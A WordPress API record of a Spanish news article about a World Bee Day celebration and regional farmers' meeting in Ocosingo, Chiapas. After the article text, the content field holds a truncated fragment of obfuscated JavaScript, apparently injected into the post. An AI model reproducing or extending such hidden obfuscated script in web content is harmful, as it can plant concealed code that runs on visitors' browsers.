{"id":22027,"date":"2025-05-22T04:23:52","date_gmt":"2025-05-22T04:23:52","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22027"},"modified":"2025-05-22T04:23:52","modified_gmt":"2025-05-22T04:23:52","slug":"celebran-el-dia-mundial-de-las-abejas-en-el-marco-del-5o-encuentro-de-productores-agropecuarios-de-la-region-selva","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22027","title":{"rendered":"Celebran el D\u00eda Mundial de las Abejas en el marco del 5\u00ba Encuentro de Productores Agropecuarios de la Regi\u00f3n Selva"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/d5a3b72e-a359-4680-be38-8a8878ab9b7e-1024x771.jpg\" alt=\"\" class=\"wp-image-22028\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/d5a3b72e-a359-4680-be38-8a8878ab9b7e-1024x771.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/d5a3b72e-a359-4680-be38-8a8878ab9b7e-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/d5a3b72e-a359-4680-be38-8a8878ab9b7e-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/d5a3b72e-a359-4680-be38-8a8878ab9b7e-1536x1156.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/d5a3b72e-a359-4680-be38-8a8878ab9b7e.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<br>Ocosingo, Chiapas, 20 de mayo de 2025.\u2013 En el marco del D\u00eda Mundial de las Abejas, la Coalici\u00f3n de Organizaciones Sociales, Productivas e Ind\u00edgenas de Chiapas (COSPICH) llev\u00f3 a cabo el 5\u00ba Encuentro de Productores Agropecuarios de la Regi\u00f3n Selva, con el objetivo de reconocer la importancia de estos polinizadores esenciales para la biodiversidad, la seguridad alimentaria y la econom\u00eda rural. El evento reuni\u00f3 a apicultores, l\u00edderes sociales y representantes gubernamentales en un esfuerzo conjunto por promover pr\u00e1cticas sostenibles en el sector agropecuario.<\/p>\n\n\n\n<p>Durante la celebraci\u00f3n se destac\u00f3 que las abejas son responsables de la polinizaci\u00f3n de m\u00e1s del 75% de los cultivos alimentarios del planeta, lo que las convierte en pilares fundamentales del equilibrio ecol\u00f3gico y la producci\u00f3n agr\u00edcola. En este contexto, se subray\u00f3 la relevancia de la apicultura en Chiapas, donde durante el 2023 se produjeron aproximadamente 5,892 toneladas de miel, posicionando al estado como el segundo mayor productor a nivel nacional, solo despu\u00e9s de Yucat\u00e1n.<\/p>\n\n\n\n<p>Municipios como Mazapa de Madero, Motozintla y Ocosingo fueron reconocidos por sus altos vol\u00famenes de producci\u00f3n, superando cada uno las 300 toneladas anuales. Asimismo, se hizo un llamado a continuar impulsando pr\u00e1cticas agr\u00edcolas sostenibles, adoptar tecnolog\u00edas limpias y proteger los ecosistemas, para asegurar que el desarrollo agropecuario sea compatible con el cuidado del medio ambiente y la mitigaci\u00f3n del cambio clim\u00e1tico.<\/p>\n\n\n\n<p>La mesa directiva de la COSPICH agradeci\u00f3 la participaci\u00f3n de diversas autoridades y aliados estrat\u00e9gicos, entre ellos cuatro regidores del Ayuntamiento Municipal de Ocosingo, el Lic. Enrique Sol\u00f3rzano, secretario de Protecci\u00f3n Civil; el Lic. N\u00e9stor Miranda, en representaci\u00f3n de la Secretar\u00eda de Bienestar en Chiapas; el Dr. Dionicio Toledo, invitado especial, y el C. Juan G\u00f3mez L\u00f3pez, presidente del Patronato de Infraestructura de la Regi\u00f3n Retiro. El evento concluy\u00f3 con un llamado a fortalecer el trabajo colaborativo entre sociedad civil y gobierno en favor del campo chiapaneco.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsalOcosingo, Chiapas, 20 de mayo de 2025.\u2013 En el marco del D\u00eda Mundial de las Abejas, la Coalici\u00f3n de Organizaciones Sociales, Productivas e Ind\u00edgenas de Chiapas (COSPICH) llev\u00f3 a cabo el 5\u00ba Encuentro de Productores Agropecuarios de la Regi\u00f3n Selva, con el objetivo de reconocer la importancia de estos polinizadores esenciales para la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22028,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-22027","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22027","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22027"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22027\/revisions"}],"predecessor-version":[{"id":22029,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22027\/revisions\/22029"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22028"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22027"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22027"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22027"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}